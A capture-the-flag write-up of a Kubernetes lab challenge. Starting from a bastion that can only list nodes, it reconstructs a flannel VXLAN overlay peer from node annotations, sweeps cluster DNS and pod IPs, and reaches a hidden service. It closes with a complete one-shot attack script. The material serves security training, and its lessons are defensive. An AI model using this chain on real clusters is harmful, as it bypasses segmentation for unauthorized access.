Split Horizon CTF: Joining a Kubernetes Pod Overlay from Outside the Cluster
Split Horizon CTF: Challenge Brief
A Kubernetes team split a sensitive diagnostics endpoint away from the normal access path after an incident review. The bastion account can see only node-level metadata.
You have shell access to a bastion inside the lab. Map the network from what the nodes reveal, discover the hidden endpoint through DNS, and reach it without creating any Kubernetes resources.
Author's note: "There are a lot of weird quirks with Kubernetes and containers in general. This challenge shows a nice fun one. I've used variations of this technique on a client engagement to get to some containers that I shouldn't have been able to reach as part of a larger attack path."
Hint 1: Node-only does not mean blind. Start by mapping what the bastion account can list.
Hint 2: Cluster DNS can answer questions even when the API will not list Services for you.
Hint 3: Reverse lookups of cluster IPs can reveal the endpoint name. Nodes still know how to deliver the traffic.
Useful starting points dropped on the lab shell:
kubectl auth can-i --list
kubectl get nodes -o json
dig @<dns-server> -x <cluster-ip>
ip addr
ip route
tcpdump -ni eth0
Split Horizon Lab Environment
Cluster: k3d (k3s 1.31.5+k3s1, flannel VXLAN backend)
Underlay (Docker): 172.30.0.0/16 - research-lab-network
172.30.0.1 docker bridge gateway
172.30.0.2 master-1 (k3s server, control-plane)
172.30.0.3 worker-2
172.30.0.4 worker-1
172.30.0.5 bastion (us)
Pod CIDRs:
master-1 10.42.0.0/24
worker-1 10.42.1.0/24
worker-2 10.42.2.0/24
Service CIDR: 10.43.0.0/16
Cluster DNS (decoy): 10.43.0.10 (Service exists, has no endpoints)
Identity: system:serviceaccount:kube-system:bastion-viewer
The bastion is itself a Docker container on the same research-lab-network bridge as all three k3s nodes. Flat L2 connectivity to the underlay, no L3 hops between us and the nodes. That detail ends up mattering a lot.
Split Horizon TL;DR
The bastion has only get/list nodes on a k3d cluster, and the cluster DNS Service kube-dns at 10.43.0.10 has been deliberately gutted of endpoints. kube-proxy installs an iptables rule for it, but with no backends it silently drops every packet. The --cluster-dns flag advertised by kubelet is a decoy.
Node objects still publish their flannel VXLAN annotations (VTEP MAC and underlay IP), which is enough information to manually join the pod overlay as a peer from the bastion. The non-obvious trick that makes the return path work is sourcing inner packets from the bastion's underlay IP: pods then reply directly to the bastion as plain L3 traffic on the Docker bridge, with no need for any node to learn our VTEP MAC and no Kubernetes resources created.
From there it's classic DNS recon: query the real CoreDNS at its pod IP, PTR-sweep the service CIDR to find the hidden endpoint name (flag-server.target.svc.cluster.local at 10.43.0.37), SRV query for the port (31337), and connect to the pod IP directly because the Service VIP routes don't reach kube-proxy correctly for our source. The flag-server is a small TCP server that responds to the literal command flag.
Phase 1: Mapping the Bastion's RBAC
kubectl auth can-i --list
Came back showing nodes [get list] plus the standard non-resource discovery URLs (/api, /apis, /healthz). Every other resource was forbidden:
services - forbidden
endpoints - forbidden
endpointslices - forbidden (a separate RBAC resource from 'endpoints', blocked independently)
configmaps - forbidden
namespaces - forbidden
pods - forbidden
events - forbidden
nodes/proxy - forbidden
nodes/log - forbidden
nodes/stats - forbidden
leases - forbidden
create/patch * - forbidden
Gotcha: kubectl auth can-i lied for some node subresources. It returned yes for nodes/proxy, nodes/log, nodes/configz, etc., but actual API calls came back forbidden ("cannot get resource 'nodes/proxy' in API group ''"). The only reliable check is making the call.
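A concrete illustration, using master-1 from this lab (the forbidden message is quoted from the actual API response):

kubectl auth can-i get nodes/proxy
# yes  <- misleading
kubectl get --raw "/api/v1/nodes/master-1/proxy/pods"
# Forbidden: "cannot get resource 'nodes/proxy' in API group ''"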
The kubeconfig held a single SA token (bastion-viewer in kube-system). No Docker socket mounted, no other kubeconfigs on disk, no admin contexts, no readable secret stash. The credential surface is genuinely a single low-privilege SA.
Phase 2: Reading What Nodes Reveal
kubectl get nodes -o json | jq '.items[] | {name, addresses: .status.addresses, podCIDR: .spec.podCIDR, annotations: .metadata.annotations}'
The k3s server flags appear right in the node annotations:
master-1:
k3s.io/node-args = ["server","--node-name","master-1",
"--service-cidr","10.43.0.0/16",
"--cluster-dns","10.43.0.10",
"--flannel-backend","vxlan",
"--disable-network-policy",
"--disable","traefik,metrics-server,servicelb,local-storage",
"--kube-apiserver-arg","watch-cache=false",
"--kube-apiserver-arg","event-ttl=10m",
"--tls-san","0.0.0.0"]
watch-cache=false and event-ttl=10m are deliberately defensive. The author wanted to limit info leakage through events and watch streams.
The interesting annotations on every node are flannel's:
flannel.alpha.coreos.com/backend-data = {"VNI":1,"VtepMAC":"<mac>"}
flannel.alpha.coreos.com/backend-type = vxlan
flannel.alpha.coreos.com/public-ip = <node underlay IP>
That gives us, for free:
| Node | Underlay IP | Pod CIDR | VTEP MAC |
|---|---|---|---|
| master-1 | 172.30.0.2 | 10.42.0.0/24 | 72:6c:75:ba:48:cb |
| worker-1 | 172.30.0.4 | 10.42.1.0/24 | 9e:dd:0e:f3:9b:8e |
| worker-2 | 172.30.0.3 | 10.42.2.0/24 | 4a:95:90:04:46:ab |
This is all the information needed to construct a flannel VXLAN peer. No node registration required, no Kubernetes resource creation.
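For repeatability, a one-liner to pull all three fields per node (the same extraction step [1] of the reproducer at the end uses, assuming jq is available):

kubectl get nodes -o json | jq -r '.items[] |
  [.metadata.name,
   .metadata.annotations["flannel.alpha.coreos.com/public-ip"],
   (.metadata.annotations["flannel.alpha.coreos.com/backend-data"] | fromjson | .VtepMAC),
   .spec.podCIDR] | @tsv'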
Phase 3: The Decoy DNS Service
First obvious move: try the cluster DNS.
ip route add 10.43.0.0/16 via 172.30.0.4 dev eth0
dig @10.43.0.10 cluster.local SOA +time=3 +tries=1
Times out. Both UDP and TCP. Identical via every node gateway (172.30.0.2/3/4). With tcpdump, the bastion sends but nothing comes back. Not a reply, not even an ICMP unreachable.
Compare to the kube API:
$ curl -sk https://10.43.0.1/healthz
# returns 401 in 8ms
The API VIP at 10.43.0.1 works fine through the same path. So routing isn't the problem; the kube-dns Service simply has no endpoints behind it. kube-proxy installs an iptables rule for the ClusterIP, but with no backends to DNAT to, traffic gets silently dropped at the rule. The --cluster-dns=10.43.0.10 advertised by kubelet is a misdirection. The real CoreDNS pod is alive somewhere; we just have to bypass the broken Service to talk to it.
Dead ends ruled out at this stage:
- TCP/UDP port scans across 10.43.0.0/24 and a sample of other /24s in the service CIDR (only the API VIP responds; no second DNS service)
- Direct TCP/UDP 53 (plus 853, 1053, 5353, 8053, 9053, 9153) to all four underlay IPs (every port returned connection refused; no host-network DNS)
- NodePort UDP scans on all three nodes (no NodePort DNS service exists)
- Docker DNS at 127.0.0.11 (knows the four research-lab-network containers and nothing else)
- API enumeration via --raw paths (/api/v1/services, /apis/discovery.k8s.io/v1/endpointslices, /api/v1/nodes/<n>/proxy/pods, etc.), all forbidden
- Direct kubelet on :10250 and the deprecated read-only port :10255 (all 401/closed)
- Source-IP spoofing onto a pod-CIDR alias on eth0 (encap not happening, return path broken)
- Searching for alternate kubeconfigs, Docker sockets, or admin tokens (none exist)
Phase 4: Building a Flannel VXLAN Peer from Outside
The plan: create a VXLAN device on the bastion with the same VNI and UDP port as flannel, manually populate FDB and ARP tables from the node annotations, and route the pod CIDRs through it.
ip link add flannel.1 type vxlan id 1 dev eth0 dstport 8472 nolearning
ip link set flannel.1 up
ip addr add 10.42.99.0/32 dev flannel.1 # cosmetic, never used as src
FDB entries tell the kernel which underlay IP to encapsulate to for each node's VTEP MAC:
bridge fdb append 72:6c:75:ba:48:cb dev flannel.1 dst 172.30.0.2 self permanent
bridge fdb append 9e:dd:0e:f3:9b:8e dev flannel.1 dst 172.30.0.4 self permanent
bridge fdb append 4a:95:90:04:46:ab dev flannel.1 dst 172.30.0.3 self permanent
Static ARP for each node's pod-CIDR gateway (.X.0):
ip neigh add 10.42.0.0 lladdr 72:6c:75:ba:48:cb dev flannel.1
ip neigh add 10.42.1.0 lladdr 9e:dd:0e:f3:9b:8e dev flannel.1
ip neigh add 10.42.2.0 lladdr 4a:95:90:04:46:ab dev flannel.1
Routes via flannel.1 to each pod CIDR:
ip route add 10.42.0.0/24 via 10.42.0.0 dev flannel.1 onlink
ip route add 10.42.1.0/24 via 10.42.1.0 dev flannel.1 onlink
ip route add 10.42.2.0/24 via 10.42.2.0 dev flannel.1 onlink
A tcpdump confirms the VXLAN encap is correct (OTV/8472, VNI=1) and that packets arrive at the right destination underlay IPs. But nothing comes back. Every probe was outbound only.
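The capture filter, for reference (flannel's VXLAN rides on 8472/udp, which older tcpdump versions decode as OTV):

tcpdump -ni eth0 'udp port 8472'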
That makes sense: the receiving node has no FDB entry mapping our flannel.1 MAC to our underlay IP. When a pod replies to 10.42.99.0, the host node looks up the route, resolves the next hop to our VTEP MAC, consults its FDB for the underlay endpoint behind that MAC… and finds nothing. The reply is silently dropped.
We can't add FDB entries on the nodes (we have no root there), and creating a Node object to make flannel auto-distribute our MAC would violate the "no Kubernetes resources" rule.
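For reference, the missing piece is a node-side FDB entry mapping the bastion's VTEP MAC (whatever ip link show flannel.1 reports on the bastion) to its underlay IP. This mirrors what flannel distributes for registered nodes, and it is exactly what we cannot do here:

# would require root on each node, which we don't have:
bridge fdb append <bastion-vtep-mac> dev flannel.1 dst 172.30.0.5 self permanent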
Phase 5: Source from the Bastion's Underlay IP
The fix turns out to be small and elegant. Linux's ip route lets us specify a source IP per-route:
ip route add 10.42.0.0/24 via 10.42.0.0 dev flannel.1 onlink src 172.30.0.5
ip route add 10.42.1.0/24 via 10.42.1.0 dev flannel.1 onlink src 172.30.0.5
ip route add 10.42.2.0/24 via 10.42.2.0 dev flannel.1 onlink src 172.30.0.5
Now when we encap a packet to a pod, the inner packet's source is 172.30.0.5, the bastion's underlay IP, an address that exists on the same Docker bridge as every node.
When the pod replies:
- The pod sends its reply to 172.30.0.5.
- Its host node looks up the route to 172.30.0.5.
- 172.30.0.5 is on the node's eth0 (Docker bridge), not in any pod CIDR.
- The reply leaves the node as a plain L3 packet on the underlay via the node's default gateway.
- The Docker bridge delivers it directly to the bastion.
No FDB lookup. No VXLAN encap on the return path. No node-side cooperation needed. The pod's reply comes back as normal IP traffic on eth0, just like any other underlay packet.
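A quick way to sanity-check the kernel's source selection before sending anything (output shape is approximate):

$ ip route get 10.42.1.2
10.42.1.2 via 10.42.1.0 dev flannel.1 src 172.30.0.5 uid 0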
Confirmation on the wire:
14:00:09.311079 IP 172.30.0.5.50478 > 172.30.0.4.8472: OTV ... 10.42.1.2.53: SOA?
14:00:09.311692 IP 10.42.1.2.53 > 172.30.0.5.50478: SOA (147)
Outbound was VXLAN-encapped, inbound was plain L3, and the bastion's userspace got the answer:
$ dig @10.42.1.2 cluster.local SOA +time=3 +tries=1
;; ANSWER SECTION:
cluster.local. 5 IN SOA ns.dns.cluster.local. hostmaster.cluster.local. ...
Hint 2 delivered: cluster DNS answers even when the API refuses to list Services.
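How we landed on 10.42.1.2 in the first place: a short SOA-probe sweep over the pod CIDRs, the same loop step [3] of the reproducer below runs (the .2-.20 range is a practical cutoff, not exhaustive):

for cidr in 10.42.0 10.42.1 10.42.2; do
  for i in $(seq 2 20); do
    ans=$(dig @"$cidr.$i" cluster.local SOA +short +time=1 +tries=1 2>/dev/null | head -1)
    [[ -n "$ans" ]] && echo "DNS responder: $cidr.$i ($ans)"
  done
done
# DNS responder: 10.42.1.2 (ns.dns.cluster.local. hostmaster.cluster.local. ...)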
Phase 6: Finding the Hidden Endpoint via PTR Sweep
CoreDNS lives on 10.42.1.2 (worker-1). With it answering, Hint 3 falls out as a one-liner:
for i in $(seq 1 254); do
ans=$(dig @10.42.1.2 -x 10.43.0.$i +short +time=1 +tries=1 2>/dev/null)
[[ -n "$ans" ]] && echo "10.43.0.$i -> $ans"
done
Output:
10.43.0.1 -> kubernetes.default.svc.cluster.local.
10.43.0.10 -> kube-dns.kube-system.svc.cluster.local. <- the decoy
10.43.0.37 -> flag-server.target.svc.cluster.local. <- the target
The hidden service is in a non-obvious namespace (target) called flag-server. CoreDNS's PTR responses leak the FQDN, namespace, and ClusterIP all at once.
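As a cross-check, the forward A record should point back at the same ClusterIP, standard cluster DNS behavior for a Service (expected output shown):

$ dig @10.42.1.2 flag-server.target.svc.cluster.local +short
10.43.0.37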
An SRV query reveals the port:
$ dig @10.42.1.2 SRV flag-server.target.svc.cluster.local +short
0 100 31337 flag-server.target.svc.cluster.local.
Port 31337. (Of course it's leetspeak.)
Phase 7: Reaching the Pod Directly
Routing the service CIDR through worker-1 with src 172.30.0.5, exactly as we did for DNS, got us only a connection timed out against 10.43.0.37:31337 over TCP. The return-path trick that worked for UDP/53 didn't survive kube-proxy's DNAT for this TCP flow. Rather than debug the asymmetry, we swept the pod CIDRs directly on :31337 over our working overlay:
for cidr in 10.42.0 10.42.1 10.42.2; do
for i in $(seq 2 30); do
ip="$cidr.$i"
timeout 1 bash -c "echo > /dev/tcp/$ip/31337" 2>/dev/null && echo "OPEN: $ip:31337"
done
done
# OPEN: 10.42.1.4:31337
Direct connect to 10.42.1.4:31337 works.
$ curl -v --max-time 5 http://10.42.1.4:31337/
* Connected to 10.42.1.4 (10.42.1.4) port 31337 (#0)
> GET / HTTP/1.1
flag input: nope
* Recv failure: Connection reset by peer
The server speaks raw TCP (HTTP/0.9-ish): it reads whatever bytes the client sends, looks for a magic word, and replies flag input: nope to anything it doesn't recognize. The command-discovery round was nothing fancier than throwing words at the socket.
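A minimal sketch of that round, assuming only newline-terminated input (the word list here is illustrative, not the exact one used):

for word in help ls list get info version flag; do
  printf '%s\n' "$word" | nc -w 2 10.42.1.4 31337
done

Everything except one word came back flag input: nope. The winner: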
$ printf "flag\n" | nc -w 3 10.42.1.4 31337
flag input: WIZ_CTF{REDACTED}
The literal command flag returns the flag.
Split Horizon CTF Flag
WIZ_CTF{REDACTED}
Split Horizon Attack Chain
Read flannel VXLAN annotations off Node objects
|
v
Build a VXLAN peer on the bastion (no Node registration)
|
v
Source inner packets from bastion's underlay IP
so pod replies route back as plain L3 traffic
|
v
Query the real CoreDNS at its pod IP (Service VIP is a decoy)
|
v
PTR-sweep the service CIDR to discover flag-server.target.svc
|
v
SRV query for the port (31337)
|
v
Connect to the flag-server pod IP directly over the overlay
|
v
Send literal command 'flag', server returns the flag
Split Horizon Kubernetes Lessons Learned
- What nodes publish about themselves can be enough to join the network they live on. Flannel annotations exist for a reason (flannel itself uses them), but they're equally useful to anyone with get nodes.
- Service VIPs are not the network; they're a kube-proxy iptables rule that may or may not work. A Service with no endpoints silently drops traffic; pod IPs don't.
- Source IP selection is a routing decision, not just a socket option. ip route … src <addr> lets you control which address upstream sees, and that choice can dictate whether the return path is encapsulated, routed, or dropped.
- Flat L2 plus an overlay is one shared fabric. Segmentation that depends on "you can't see the pod network" assumes attackers won't reconstruct the overlay from public metadata. They will.
- kubectl auth can-i can lie about node subresources. It returned yes for nodes/proxy, nodes/log, and nodes/configz, but real API calls came back forbidden. Always verify by making the call.
Split Horizon One-Shot Reproducer
This script reproduces the entire solution from a fresh bastion and ends by printing the flag.
#!/bin/bash
# ============================================================================
# Wiz Cloud Security Championship #11 - Split Horizon
# Author: Mohit Gupta / Skybound
# Solution: one-shot reproducer from a fresh bastion
# ============================================================================
# Premise: bastion has only `get nodes` on a k3d cluster. The flag-server is a
# Kubernetes Service the API will not enumerate. We get to it by:
# 1. Reading flannel VXLAN annotations off node objects
# 2. Manually joining the pod overlay as a peer (no node registration)
# 3. Sourcing inner packets from bastion's underlay IP so replies come back
# as plain L3 traffic (the "weird quirk")
# 4. Querying CoreDNS directly at its pod IP (Service VIP has no endpoints)
# 5. PTR-sweeping the service CIDR to find flag-server's name
# 6. SRV query to find the listening port
# 7. Hitting the flag-server pod IP directly via the overlay
# 8. Sending the literal command 'flag' - server returns the flag string
# ============================================================================
set -e
echo "=== [0] Setup ==="
apt update -qq && apt install -y -qq nmap dnsutils tcpdump bridge-utils >/dev/null
echo ""
echo "=== [1] Map the network from node annotations (Hint 1) ==="
NODES_JSON=$(kubectl get nodes -o json)
echo "$NODES_JSON" | jq -r '.items[] | "\(.metadata.name) underlay=\(.metadata.annotations["flannel.alpha.coreos.com/public-ip"]) podCIDR=\(.spec.podCIDR) vtep=\(.metadata.annotations["flannel.alpha.coreos.com/backend-data"] | fromjson | .VtepMAC)"'
declare -A NODE_IP NODE_VTEP NODE_PODCIDR
while IFS=$'\t' read -r name underlay vtep podcidr; do
NODE_IP[$name]=$underlay
NODE_VTEP[$name]=$vtep
NODE_PODCIDR[$name]=$podcidr
done < <(echo "$NODES_JSON" | jq -r '.items[] | [.metadata.name, .metadata.annotations["flannel.alpha.coreos.com/public-ip"], (.metadata.annotations["flannel.alpha.coreos.com/backend-data"] | fromjson | .VtepMAC), .spec.podCIDR] | @tsv')
echo ""
echo "=== [2] Build flannel overlay peer ==="
ip link del flannel.1 2>/dev/null || true
for c in 0 1 2; do ip route del 10.42.$c.0/24 2>/dev/null || true; done
ip route del 10.43.0.0/16 2>/dev/null || true
# Same VNI/dstport as flannel
ip link add flannel.1 type vxlan id 1 dev eth0 dstport 8472 nolearning
ip link set flannel.1 up
ip addr add 10.42.99.0/32 dev flannel.1 # cosmetic; not used as src
# Populate FDB and ARP from node annotations
for name in "${!NODE_IP[@]}"; do
bridge fdb append "${NODE_VTEP[$name]}" dev flannel.1 dst "${NODE_IP[$name]}" self permanent
gw=$(echo "${NODE_PODCIDR[$name]}" | sed 's|/.*||')
ip neigh replace "$gw" lladdr "${NODE_VTEP[$name]}" dev flannel.1
done
# KEY TRICK: src 172.30.0.5 forces inner packets to be sourced from bastion's
# underlay IP, so pod replies route back as plain L3 traffic via the node's
# default gateway → docker bridge → us. No need for the receiving node to
# know our VTEP MAC.
BASTION_IP=$(ip -4 -o addr show eth0 | awk '{print $4}' | cut -d/ -f1)
for name in "${!NODE_PODCIDR[@]}"; do
cidr="${NODE_PODCIDR[$name]}"
gw=$(echo "$cidr" | sed 's|/.*||')
ip route add "$cidr" via "$gw" dev flannel.1 onlink src "$BASTION_IP"
done
echo "Routes:"
ip route show | grep 10.42
echo ""
echo "=== [3] Find CoreDNS pod by sweeping pod CIDRs (Hint 2) ==="
COREDNS_IP=""
for name in "${!NODE_PODCIDR[@]}"; do
cidr_base=$(echo "${NODE_PODCIDR[$name]}" | sed 's|\.0/.*||')
for i in $(seq 2 20); do
ip="$cidr_base.$i"
ans=$(timeout 1 dig @"$ip" cluster.local SOA +short +time=1 +tries=1 2>/dev/null | head -1)
if [[ -n "$ans" ]] && [[ "$ans" != *"error"* ]] && [[ "$ans" != *"timed out"* ]]; then
echo "CoreDNS found: $ip ($ans)"
COREDNS_IP="$ip"
break 2
fi
done
done
[[ -z "$COREDNS_IP" ]] && { echo "ERROR: no CoreDNS pod found"; exit 1; }
echo ""
echo "=== [4] PTR-sweep service CIDR to find target service (Hint 3) ==="
TARGET_SVC=""
TARGET_VIP=""
for i in $(seq 1 254); do
ans=$(dig @"$COREDNS_IP" -x 10.43.0.$i +short +time=1 +tries=1 2>/dev/null)
if [[ -n "$ans" ]]; then
echo "10.43.0.$i -> $ans"
if [[ "$ans" != *"kubernetes.default"* ]] && [[ "$ans" != *"kube-dns"* ]]; then
TARGET_SVC="${ans%.}"
TARGET_VIP="10.43.0.$i"
fi
fi
done
[[ -z "$TARGET_SVC" ]] && { echo "ERROR: no target service found"; exit 1; }
echo "Target: $TARGET_SVC @ $TARGET_VIP"
echo ""
echo "=== [5] SRV query to learn the port ==="
SRV_LINE=$(dig @"$COREDNS_IP" SRV "$TARGET_SVC" +short)
echo "SRV: $SRV_LINE"
TARGET_PORT=$(echo "$SRV_LINE" | awk '{print $3}')
[[ -z "$TARGET_PORT" ]] && { echo "ERROR: no SRV port"; exit 1; }
echo "Port: $TARGET_PORT"
echo ""
echo "=== [6] Find target pod IP (Service VIP isn't reachable for our source) ==="
TARGET_POD=""
for name in "${!NODE_PODCIDR[@]}"; do
cidr_base=$(echo "${NODE_PODCIDR[$name]}" | sed 's|\.0/.*||')
for i in $(seq 2 30); do
ip="$cidr_base.$i"
if timeout 1 bash -c "echo > /dev/tcp/$ip/$TARGET_PORT" 2>/dev/null; then
echo "Target pod open: $ip:$TARGET_PORT"
TARGET_POD="$ip"
break 2
fi
done
done
[[ -z "$TARGET_POD" ]] && { echo "ERROR: no pod listening on $TARGET_PORT"; exit 1; }
echo ""
echo "=== [7] Submit 'flag' command - server responds with the flag ==="
RESPONSE=$(printf "flag\n" | nc -w 3 "$TARGET_POD" "$TARGET_PORT")
echo "$RESPONSE"
FLAG=$(echo "$RESPONSE" | grep -oE 'WIZ_CTF\{[^}]+\}')
if [[ -n "$FLAG" ]]; then
echo ""
echo "==============================================="
echo "FLAG: $FLAG"
echo "==============================================="
else
echo ""
echo "Flag not found in response - paste output for analysis."
fi
Split Horizon CTF: Final Thoughts
Split Horizon is a beautiful demonstration of a recurring lesson in Kubernetes security: the API surface and the network surface are two different things, and the network does not care what RBAC says. The bastion's role bound it to get/list nodes and nothing else, which sounds tightly scoped, until you remember that nodes publish enough information to participate in the cluster's data plane, and the data plane runs on the same flat L2 segment the bastion lives on.
The source-IP trick (sourcing inner packets from the underlay IP so replies come back as plain L3 traffic) is the kind of small, elegant move that turns a stuck overlay into a working one. It exploits no bug. Linux's routing table did exactly what it was told to do; the pod's host node did exactly what it was told to do; flannel forwarded a packet whose inner header pointed at an address it didn't try to encap. Each link in the chain is "working as intended." It just so happens that those intentions, composed, hand an attacker a working overlay peer with no node-side cooperation.
The decoy kube-dns Service is a nice touch on the puzzle side; it teaches that a Kubernetes Service is just a kube-proxy iptables rule, and that a rule with no endpoints behind it silently drops traffic rather than refusing it. The lesson generalises: ClusterIPs are an abstraction over routing, and abstractions over routing fail in ways routers don't.
Challenge created by Mohit Gupta / Skybound as part of the Wiz Cloud Security Championship. Writeup completed: May 2026